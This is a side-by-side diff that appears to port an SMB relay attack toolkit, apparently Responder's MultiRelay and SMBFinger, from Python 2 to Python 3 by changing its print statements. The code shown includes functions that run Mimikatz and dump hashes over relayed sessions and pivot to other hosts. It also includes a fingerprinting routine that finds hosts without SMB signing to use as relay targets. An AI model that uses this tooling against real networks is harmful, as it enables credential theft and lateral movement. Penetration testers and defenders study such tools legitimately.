#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########MimiKatz RPC############# ##########MimiKatz RPC#############
@ -1961,7 +1961,7 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName):
@ -1990,7 +1990,7 @@ def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileNam
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32." print ("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########Pivot############# ##########Pivot#############
@ -2017,7 +2017,7 @@ def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath,
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########VerifyPivot############# ##########VerifyPivot#############
@ -2049,7 +2049,7 @@ def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPat
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########DoSomethingDumb############# ##########DoSomethingDumb#############

12
tools/MultiRelay/RelayMultiPackets.py
View file

@ -388,20 +388,20 @@ class SMBSessionSetupAndxAUTH(Packet):
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"]) SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
NTLMData = str(self.fields["Data"]) NTLMData = str(self.fields["Data"])
###### ASN Stuff ###### ASN Stuff
if len(NTLMData) > 255: if len(NTLMData) > 255:
self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0) self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
else: else:
self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3) self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
if len(NTLMData)-8 > 255: if len(NTLMData)-8 > 255:
self.fields["AsnSecMechLenOfLen"] = "\x82" self.fields["AsnSecMechLenOfLen"] = "\x82"
self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4) self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
else: else:
self.fields["AsnSecMechLenOfLen"] = "\x81" self.fields["AsnSecMechLenOfLen"] = "\x81"
self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6) self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
if len(NTLMData)-12 > 255: if len(NTLMData)-12 > 255:
self.fields["ChoosedTagLenOfLen"] = "\x82" self.fields["ChoosedTagLenOfLen"] = "\x82"

52
tools/SMBFinger/Finger.py
View file

@ -126,7 +126,7 @@ class SMBNegoDataLanMan(Packet):
##################### #####################
def color(txt, code = 1, modifier = 0): def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def IsSigningEnabled(data): def IsSigningEnabled(data):
if data[39] == "\x0f": if data[39] == "\x0f":
@ -141,27 +141,27 @@ def dtoa(d):
return inet_ntoa(struct.pack("!L", d)) return inet_ntoa(struct.pack("!L", d))
def OsNameClientVersion(data): def OsNameClientVersion(data):
try: try:
length = struct.unpack('<H',data[43:45])[0] length = struct.unpack('<H',data[43:45])[0]
if length > 255: if length > 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]]) OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion return OsVersion, ClientVersion
if length <= 255: if length <= 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]]) OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion return OsVersion, ClientVersion
except: except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version" return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data): def GetHostnameAndDomainName(data):
try: try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]]) DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
#If max length domain name, there won't be a \x00\x00\x00 delineator to split on #If max length domain name, there won't be a \x00\x00\x00 delineator to split on
if Hostname == '': if Hostname == '':
DomainJoined = data[81:110].replace('\x00','') DomainJoined = data[81:110].replace('\x00','')
Hostname = data[113:].replace('\x00','') Hostname = data[113:].replace('\x00','')
return Hostname, DomainJoined return Hostname, DomainJoined
except: except:
return "Could not get Hostname.", "Could not get Domain joined" return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host): def DomainGrab(Host):
s = socket(AF_INET, SOCK_STREAM) s = socket(AF_INET, SOCK_STREAM)
@ -169,7 +169,7 @@ def DomainGrab(Host):
s.settimeout(Timeout) s.settimeout(Timeout)
s.connect(Host) s.connect(Host)
except: except:
print "Host down or port close, skipping" print ("Host down or port close, skipping")
pass pass
try: try:
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00") h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
@ -191,7 +191,7 @@ def SmbFinger(Host):
s.settimeout(Timeout) s.settimeout(Timeout)
s.connect(Host) s.connect(Host)
except: except:
print "Host down or port close, skipping" print ("Host down or port close, skipping")
pass pass
try: try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8") h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
@ -252,10 +252,10 @@ def ShowResults(Host):
Signing, OsVer, LanManClient = SmbFinger(Host) Signing, OsVer, LanManClient = SmbFinger(Host)
enabled = color("SMB signing is mandatory. Choose another target", 1, 1) enabled = color("SMB signing is mandatory. Choose another target", 1, 1)
disabled = color("SMB signing: False", 2, 1) disabled = color("SMB signing: False", 2, 1)
print color("Retrieving information for %s..."%Host[0], 8, 1) print (color("Retrieving information for %s..."%Host[0], 8, 1))
print enabled if Signing else disabled print (enabled if Signing else disabled)
print color("Os version: '%s'"%(OsVer), 8, 3) print (color("Os version: '%s'"%(OsVer), 8, 3))
print color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3) print (color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3))
except: except:
pass pass
@ -288,7 +288,7 @@ def ShowScanSmallResults(Host):
Hostname, DomainJoined = DomainGrab(Host) Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host) Signing, OsVer, LanManClient = SmbFinger(Host)
Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing) Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing)
print Message print (Message)
except: except:
pass pass
@ -299,13 +299,13 @@ def ShowSigning(Host):
s.settimeout(Timeout) s.settimeout(Timeout)
s.connect((Host, 445)) s.connect((Host, 445))
except: except:
print "[Pivot Verification Failed]: Target host is down" print ("[Pivot Verification Failed]: Target host is down" )
return True return True
try: try:
Signing = SmbFingerSigning(Host) Signing = SmbFingerSigning(Host)
if Signing == True: if Signing == True:
print "[Pivot Verification Failed]:Signing is enabled. Choose another host." print ("[Pivot Verification Failed]:Signing is enabled. Choose another host.")
return True return True
else: else:
return False return False